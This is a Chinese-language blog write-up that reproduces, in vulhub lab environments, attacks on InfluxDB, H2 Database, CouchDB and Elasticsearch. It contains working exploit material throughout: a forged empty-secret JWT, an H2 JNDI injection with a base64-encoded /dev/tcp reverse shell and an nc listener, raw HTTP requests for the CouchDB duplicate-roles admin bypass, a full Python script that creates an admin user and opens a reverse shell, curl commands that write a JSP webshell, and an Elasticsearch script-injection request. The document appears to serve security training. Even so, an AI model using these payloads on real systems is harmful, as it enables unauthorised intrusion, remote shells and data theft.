数据库安全-H2 databaseElasticsearchCouchDBInfluxdb漏洞复现

目录

  • 数据库安全-H2 database&Elasticsearch&CouchDB&Influxdb 复现
    • influxdb-未授权访问-jwt 验证
    • H2database-未授权访问-配置不当
    • CouchDB-权限绕过配合 RCE-漏洞
      • CouchDB 垂直权限绕过
      • Couchdb 任意命令执行 RCE
    • ElasticSearch-文件写入&RCE-漏洞
      • Elasticsearch写入webshell漏洞
      • ElasticSearch 命令执行漏洞

数据库安全-H2 database&Elasticsearch&CouchDB&Influxdb 复现

influxdb-未授权访问-jwt 验证

参考:influxdb

CVE-2019-20933

靶场环境:vulhub

image-20231014121830574

打开靶场进入环境:

image-20231014122605319

访问:

image-20231014123029113

端口扫描:

image-20231014122718088

默认端口:

8086:用于客户端和服务端交互的HTTP API

8088 :用于提供备份和恢复的RPC服务

influxdb 是一款著名的时序数据库,其使用 jwt 作为鉴权方式。在用户开启了认证, 但未设置参数 shared-secret 的情况下,jwt 的认证密钥为空字符串,此时攻击者可 以伪造任意用户身份在 influxdb 中执行 SQL 语句。

登录授权:

image-20231014124013139

提交,提示错误:

image-20231014124508749

我们可以使用https://jwt.io/用一个空的秘密密钥生成有效的JWT令牌

借助https://jwt.io/来生成 jwt token:

image-20231014124823395

抓取数据包,带着令牌进行发送数据包,触发未授权。

成功查询

image-20231014125034226

界面效果:

image-20231014125050075

也可进行其他sql语句的查询:

查数据库:

image-20231014125212915

H2database-未授权访问-配置不当

默认端口:20051

H2 database 是一款 Java 内存数据库,多用于单元测试。H2 database 自带一个 Web 管理页面,在 Spirng 开发中,如果我们设置如下选项,即可允许外部用户访问 Web 管理页面,且没有鉴权:

spring.h2.console.enabled=true

spring.h2.console.settings.web-allow-others=true

靶场环境:vulhub

具体参考:H2 Database未授权

image-20231014142646291

打开靶场进入环境:

image-20231014143143738

界面效果:

image-20231014143259706

利用这个管理页面,我们可以进行 JNDI 注入攻击,进而在目标环境下执行任意命令。

工具地址:JNDI-Injection-Exploit

payload:
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,L2Jpbi9zaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwMC4xLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}" -A 攻击者IP//反弹shell命令就行base64编码
/bin/sh -i >& /dev/tcp/192.168.100.1/6666 0>&1
编码后:
bash -c {echo,L2Jpbi9zaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwMC4xLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}

image-20231014161336363

攻击端就行监听:

nc -lvvp 6666

将生成出来的所提供的服务,输入到界面当中,进行连接

//指定驱动类:
javax.naming.InitialContext

服务端可以观察到日志:

image-20231014161740497

成功反弹shell

image-20231014161405564

也可以将反弹shell命令换成其他执行命令
比如:touch /123.txt

CouchDB-权限绕过配合 RCE-漏洞

CouchDB是一个完全包含web的数据库。使用JSON文档存储数据。通过HTTP使用web浏览器访问您的文档。使用JavaScript查询、合并和转换文档。CouchDB适用于现代网络和移动应用程序。

Apache CouchDB是一个开源的面向文档的NoSQL数据库,用Erlang实现。CouchDB 使用多种格式和协议来存储、传输和处理其数据。它使用JSON来存储数据,使用MapReduce使用JavaScript作为查询语言,使用HTTP作为API。

CouchDB 垂直权限绕过

靶场环境:vulhub

参考:CVE-2017-12635

image-20231014163029081

开启靶场环境:

image-20231014165518123

访问界面:

image-20231014165625613

后台:

image-20231014165719180

获取数据包,进行修改:

//数据包修改后的内容:PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: 192.168.100.134:5984
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 92{"type": "user","name": "vulhub","roles": ["_admin"],"password": "vulhub"
}

放包后,观察返回结果:

image-20231014165854208

返回 403 错误:说明只有管理员可以使用该端点。
{"error": "forbidden", "reason": "Only _admin may set roles"}

通过发送包含重复角色的请求来绕过限制

//修改后的数据包内容:PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: 192.168.100.134:5984
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 108{"type": "user","name": "vulhub","roles": ["_admin"],"roles": [],"password": "vulhub"
}

重发测试:

image-20231014170426763

观察返回内容,已成功创建具有密码的用户 。
用户名vulhub和密码vulhub

登录后台:

image-20231014170627774

成功进入后台:

image-20231014170640974

image-20231014170704525

Couchdb 任意命令执行 RCE

靶场环境:vulhub

参考:CVE-2017-12636

image-20231014170952662

打开靶场,进入环境:

image-20231014171521676

访问:

image-20231014171545007

可执行使用脚本,进行反弹shell

exp:#!/usr/bin/env python3
import requests
import json
import base64
from requests.auth import HTTPBasicAuthtarget = 'http://your-ip:5984'
command = rb"""sh -i >& /dev/tcp/攻击者IP/443 0>&1"""
version = 1session = requests.session()
session.headers = {'Content-Type': 'application/json'
}
# session.proxies = {
#     'http': 'http://127.0.0.1:8085'
# }
session.put(target + '/_users/org.couchdb.user:wooyun', data='''{"type": "user","name": "wooyun","roles": ["_admin"],"roles": [],"password": "wooyun"
}''')session.auth = HTTPBasicAuth('wooyun', 'wooyun')command = "bash -c '{echo,%s}|{base64,-d}|{bash,-i}'" % base64.b64encode(command).decode()
if version == 1:session.put(target + ('/_config/query_servers/cmd'), data=json.dumps(command))
else:host = session.get(target + '/_membership').json()['all_nodes'][0]session.put(target + '/_node/{}/_config/query_servers/cmd'.format(host), data=json.dumps(command))session.put(target + '/wooyun')
session.put(target + '/wooyun/test', data='{"_id": "wooyuntest"}')if version == 1:session.post(target + '/wooyun/_temp_view?limit=10', data='{"language":"cmd","map":""}')
else:session.put(target + '/wooyun/_design/test', data='{"_id":"_design/test","views":{"wooyun":{"map":""} },"language":"cmd"}')

开启监听,执行脚本过后:

image-20231014172023069

成功反弹

image-20231014172050445

ElasticSearch-文件写入&RCE-漏洞

靶场环境:vulhub

Elasticsearch写入webshell漏洞

参考:Elasticsearch

开启环境:

image-20231014203435971

image-20231014203421817

访问:

image-20231014203654231

image-20231014203707387

测试环境同时运行了Tomcat和ElasticSearch,Tomcat目录在/usr/local/tomcat,web目录是/usr/local/tomcat/webapps,ElasticSearch目录在/usr/share/elasticsearch

目标就是利用ElasticSearch,在目录下写入我们的webshell。/usr/local/tomcat/webapps

payload:
//创建一个恶意索引文档
curl -XPOST http://127.0.0.1:9200/yz.jsp/yz.jsp/1 -d'
{"<%new java.io.RandomAccessFile(application.getRealPath(new String(new byte[]{47,116,101,115,116,46,106,115,112})),new String(new byte[]{114,119})).write(request.getParameter(new String(new byte[]{102})).getBytes());%>":"test"}
'//再创建一个恶意的存储库,其中的值即为我要写入的路径。location
curl -XPUT 'http://127.0.0.1:9200/_snapshot/yz.jsp' -d '{"type": "fs","settings": {"location": "/usr/local/tomcat/webapps/wwwroot/","compress": false}
}'//存储库验证并创建:
curl -XPUT "http://127.0.0.1:9200/_snapshot/yz.jsp/yz.jsp" -d '{"indices": "yz.jsp","ignore_unavailable": "true","include_global_state": false
}'

执行过程:

image-20231014204140532

接下来进行访问,这个就是我们写入的webshell。

http://靶机IP:8080/wwwroot/indices/yz.jsp/snapshot-yz.jsp

该shell的作用是向wwwroot下的test.jsp文件中写入任意字符串。

可以写入木马,使用工具进行连接。

image-20231014204608130

访问:

image-20231014204636130

ElasticSearch 命令执行漏洞

靶场:vulhub

参考:CVE-2014-3120

开启环境:

image-20231014205351603

访问:

image-20231014205334774

该漏洞需要es中至少存在一条数据,所以我们需要先创建一条数据

抓包修改数据包内容信息:

首先创建一条数据:

//修改后的数据包内容
POST /website/blog/ HTTP/1.1
Host: 192.168.100.134:9200
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Cookie: AuthSession=dnVsaHViOjY1MkE1QTEwOmDxwivZa1OAfJ9MXdQyTDIe2AF3
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 25{"name": "phithon"
}

image-20231014210651011

执行任意代码:

//修改后的数据包
POST /_search?pretty HTTP/1.1
Host: 192.168.100.134:9200
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Cookie: AuthSession=dnVsaHViOjY1MkE1QTEwOmDxwivZa1OAfJ9MXdQyTDIe2AF3
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 356{"size": 1,"query": {"filtered": {"query": {"match_all": {}}}},"script_fields": {"command": {"script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"id\").getInputStream()).useDelimiter(\"\\\\A\").next();"}}
}

观察响应包,成功执行命令:

image-20231014210835736

还可尝试其他命令执行,或反弹shell

image-20231014210938719

image-20231014210959428

界面效果:

image-20231014211050936

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/158552.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

School‘s Java test

欢迎来到Cefler的博客&#x1f601; &#x1f54c;博客主页&#xff1a;那个传说中的man的主页 &#x1f3e0;个人专栏&#xff1a;题目解析 &#x1f30e;推荐文章&#xff1a;题目大解析&#xff08;3&#xff09; 目录 &#x1f449;&#x1f3fb;第四周素数和念整数 &#…

【PostgreSQL启动,停止命令(重启)】

找到 /usr/lib/systemd/system文件夹路径看是否包含 postgresql服务 关闭服务&#xff1a; systemctl stop postgresql-12.service启动服务 systemctl start postgresql-12.service重启服务 systemctl restart postgresql-12查看状态 systemctl status postgresql-12.servi…

4+1视图与UML

目录 逻辑视图过程视图开发视图物理视图&#xff08;部署视图&#xff09;用例视图 41视图&#xff0c;即逻辑视图&#xff0c;过程视图&#xff0c;实现视图&#xff0c;部署视图&#xff0c;用例视图。 为什么不用一个视图&#xff1f; 针对多个用户&#xff0c;即终端用户&a…

打造震撼视觉效果,体验全新After Effects 2024 for Mac/win

想要创作令人惊叹、震撼人心的视觉效果吗&#xff1f;那就来尝试全新的After Effects 2024吧&#xff01;After Effects是业界领先的视觉特效和动画软件&#xff0c;为您提供了无限可能性。无论是电影、广告、视频、网站还是应用程序&#xff0c;After Effects都可以帮助您创建…

前端基础一:用Formdata对象来上传图片的原因

最近有人问&#xff1a;你是否能用json来传图片&#xff0c;其实应该这么理解就对了。 一、上传的数据体格式Content-Type 1.application/x-www-form-urlencoded 2.application/json 3.multipart/form-data 以上三种类型旨在告诉服务器需要接收的数据类型同事要…

论文阅读:Image-to-Lidar Self-Supervised Distillation for Autonomous Driving Data

目录 摘要 Motivation 整体架构流程 技术细节 雷达和图像数据的同步 小结 论文地址: [2203.16258] Image-to-Lidar Self-Supervised Distillation for Autonomous Driving Data (arxiv.org) 论文代码&#xff1a;GitHub - valeoai/SLidR: Official PyTorch implementati…

C++ 反向迭代器

反向迭代器的即正向迭代器的--&#xff0c;反向迭代器的--即正向迭代器的&#xff0c;反向迭代器和正向迭代器的很多功能都是相似的&#xff0c;因此我们可以复用正向迭代器作为反向迭代器的底层容器来封装&#xff0c;从而实现出反向迭代器&#xff0c;即&#xff1a;反向迭代…

python文本转语音

概述 目前有文本转语音的技术&#xff0c;可以用在配音领域&#xff0c;我个人因为一些需求&#xff0c;所以开始寻找这方面的资源&#xff0c;目前各大平台&#xff0c;比如腾讯&#xff0c;讯飞&#xff0c;阿里&#xff0c;百度等都有这样的API服务&#xff0c;我个人是是使…

linux shell环境下处理yml文件

需要安装工具yq sudo pip install yq 这里我使用pip3指定源安装 sudo pip3 install -i https://pypi.tuna.tsinghua.edu.cn/simple yq 1. 读取文件内容&#xff1a; 我使用的版本是yq 3.2.3,以下命令执行会报错&#xff1a; yq r chainmaker.yml .blockchain yq r chain…

2023-10-14 LeetCode每日一题(只出现一次的数字)

2023-10-14每日一题 一、题目编号 136. 只出现一次的数字二、题目链接 点击跳转到题目位置 三、题目描述 给你一个 非空 整数数组 nums &#xff0c;除了某个元素只出现一次以外&#xff0c;其余每个元素均出现两次。找出那个只出现了一次的元素。 你必须设计并实现线性时…

RootSIFT---SIFT图像特征的扩展

RootSIFT是论文 Three things everyone should know to improve object retrieval - 2012所提出的 A Comparative Analysis of RootSIFT and SIFT Methods for Drowsy Features Extraction - 2020 当比较直方图时&#xff0c;使用欧氏距离通常比卡方距离或Hellinger核时的性能…

zabbix监控——自定义监控内容

目录 自定义监控项步骤 案例 1、明确需要执行的命令 2、创建 zabbix 的监控项配置文件&#xff0c;用于自定义 key&#xff0c;并重启zabbix-agent2 3、.在服务端验证新建的监控项 4、在 Web 页面创建自定义监控项模板 1&#xff09;创建模板 2&#xff09;创建监控项 …

振弦传感器和无线振弦采集仪在隧道安全监测的解决方案

振弦传感器和无线振弦采集仪在隧道安全监测的解决方案 隧道作为交通工程的重要组成部分&#xff0c;具有极高的安全风险&#xff0c;因此隧道安全监测是必不可少的。振弦传感器和无线振弦采集仪作为隧道安全监测的两种重要设备&#xff0c;能够有效地监测隧道的振动情况&#…

Rancher 使用指南

Rancher 使用指南 Rancher 是什么?Rancher 与 OpenShift / Kubesphere 主要区别对比RancherOpenShiftKubesphere 对比 Rancher 和 OpenShift Rancher 安装 Rancher 是什么? 企业级Kubernetes管理平台 Rancher 是供采用容器的团队使用的完整软件堆栈。它解决了管理多个Kuber…

PIL Image格式转Tensor

Image格式是由PIL库读入的图片格式 from PIL import Image torch.Tensor是用于深度学习计算的张量格式 import torch 1 Image格式转Tensor 先转numpy 再转tensor torch.from_numpy() np.asarray() image torch.from_numpy(np.asarray(image)) 但是报错: max_pool2d” not im…

智能网关IOT 2050采集应用

SIMATIC IOT2050 是西门子公司新推出的应用于企业数字化转型的智能边缘计算和云连接网关。 它将云、公司内 IT 和生产连接在一起&#xff0c;专为直接在生产环境中获取、处理和传输数据的工业 IT 解 决方案而设计。例如&#xff0c;它可用于将生产 过程与基于云的机器和生产数据…

AC修炼计划(AtCoder Regular Contest 166)

传送门&#xff1a;AtCoder Regular Contest 166 - AtCoder 一直修炼cf&#xff0c;觉得遇到了瓶颈了&#xff0c;所以想在atcode上寻求一些突破&#xff0c;今天本来想尝试vp AtCoder Regular Contest 166&#xff0c;但结局本不是很好&#xff0c;被卡了半天&#xff0c;止步…

Vue条件渲染

一、使用v-show条件渲染 语法格式&#xff1a; v-show"表达式" // true 或 false 当表达式的值为true的时候就显示&#xff0c;表达式值为false的时候隐藏。 下面是使用v-show实现的一个点击按钮切换显示和隐藏的小案例 &#xff1a; 值得注意的是&#xff0c;使…

Element Plus阻止 el-dropdown、el-switch等冒泡事件

最近做vue3项目&#xff0c;使用Element Plus,又遇到坑了&#xff01; 问题点&#xff1a;组件中遇到事件冒泡问题了&#xff0c;el-checkbox 中 change事件要求阻止冒泡&#xff0c;如下代码中要求点击checkbox时不调用li标签的show方法 <li click"show()">…

kafka属性说明

kafka中关于一些字段说明 groupId :标识消费者分组id&#xff0c;如果多个消费者id相同&#xff0c;就表示这几个消费者是一组&#xff0c;当一组多个消费者消费同一个topic时&#xff0c;一组中只会有一个成功消费 代码如下 这时只会有一条消息被消费